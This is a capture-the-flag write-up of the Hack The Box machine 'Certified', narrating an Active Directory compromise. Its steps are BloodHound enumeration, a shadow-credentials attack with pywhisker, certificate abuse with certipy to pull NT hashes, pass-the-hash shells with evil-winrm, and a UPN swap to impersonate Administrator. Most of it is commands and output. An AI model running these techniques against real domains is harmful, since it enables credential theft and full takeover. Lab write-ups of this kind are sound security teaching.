Certified is a medium-difficulty machine from Hack The Box dealing initially with provided credentials that will allow us to enumerate the DC through BloodHound. We’ll then abuse judith’s WriteOwner over the MANAGEMENT group to make her owner and add herself to the group so she’ll be able to abuse msDS-KeyCredentialLink over svc_management user to request a certificate on his behalf and get user flag. Finally we’ll abuse svc_management’s GenericAll on ca_operator to change his upn to the administrator and request a certificate on his behalf to get a hold to his NTLM Hash.
┌──(kali㉿kali)-[~] └─$ nmap -A-Pn10.129.22.253 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-0513:32 EST Nmap scan report for10.129.22.253 Host is up (0.12s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-0601:37:30Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 |_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time. | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 |_ssl-date: 2024-11-06T01:38:53+00:00; +7h04m53s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.certified.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb | Not valid before: 2024-05-13T15:49:36 |_Not valid after: 2025-05-13T15:49:36 |_ssl-date: 2024-11-06T01:38:54+00:00; +7h04m52s from scanner time. Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
┌──(kali㉿kali)-[~/Hackthebox/Certified] └─$ bloodhound-python -d certified.htb -c all -u judith.mader -p 'judith09' -ns 10.129.22.253 --zip /usr/lib/python3/dist-packages/bloodhound/ad/utils.py:115: SyntaxWarning: invalid escape sequence '\-' xml_sid_rex = re.compile('<UserId>(S-[0-9\-]+)</UserId>') INFO: Found AD domain: certified.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.certified.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.certified.htb INFO: Found 10 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: DC01.certified.htb INFO: Done in 00M 16S INFO: Compressing output into 20250314235232_bloodhound.zip
We can first set judith as an owned user, then we can see that she has WriteOwner on the MANAGEMENT group which has GenericWrite on MANAGEMENT_SVC user who can PSRemote to the DC. So what we’ll be doing now is first add ourselves as owner of MANAGEMENT group, then add ourselves as a member to later abuse the GenericWrite functionality. BloodHound Enumeration
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ python3 pywhisker.py --dc-ip 10.129.22.253 -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add" [*] Searching for the target account [*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b408c279-49d2-1cf9-a680-792376ef3f43 [*] Updating the msDS-KeyCredentialLink attribute of management_svc [+] Updated the msDS-KeyCredentialLink attribute of the target object [+] Saved PFX (#PKCS12) certificate & key at path: O5DKZp1j.pfx [*] Must be used with password: E1oblaZPhYWbHhc8Z169 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools ┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ certipy-ad cert -export -pfx "/home/kali/Hackthebox/Certified/pywhisker/O5DKZp1j.pfx" -password "E1oblaZPhYWbHhc8Z169" -out "unprotected.pfx" Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'unprotected.pfx' ┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ certipy-ad auth -pfx unprotected.pfx -dc-ip '10.129.22.253' -username 'management_svc' -domain 'certified.htb' Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate [*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'management_svc.ccache' [*] Trying to retrieve NT hashfor'management_svc' [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584
And we got it!
Now we can grab our user flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ evil-winrm -i 10.129.22.253 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\management_svc\Documents> type ../desktop/user.txt 15df55cc8b45dd564d9e16cdc7ce4196 *Evil-WinRM* PS C:\Users\management_svc\Documents>
Privilege Escalation
Looking at the privilege svc_management has, we can see he has GenericAll on ca_operator. What we can do is change ca_operator’s password, update his UPN to the administrator’s, request a certificate using certipy then authenticate to the administrator to get his hashes.
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\(' "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ", [+] Trying to resolve 'CERTIFIED.HTB' at '192.168.235.2' [+] Resolved 'CERTIFIED.HTB' from cache: 10.129.22.253 [+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.129.22.253[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.129.22.253[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 4 [*] Got certificate with UPN 'Administrator' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
And now we can auth to the user and get his hash:
1 2 3 4 5 6 7 8 9 10 11 12
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ certipy-ad auth -pfx administrator.pfx -domain certified.htb Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected] [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'[email protected]': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
And we can now claim our root flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~/Hackthebox/Certified/pywhisker] └─$ evil-winrm -i 10.129.22.253 -u administrator -H '0d5b49608bbce1751f708748f67e2d34' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt a3bee3c7ebc8c6dc7f0bf15e791c1f84 *Evil-WinRM* PS C:\Users\Administrator\Documents>
That was it for Certified, hope you learned something new! -0xkujen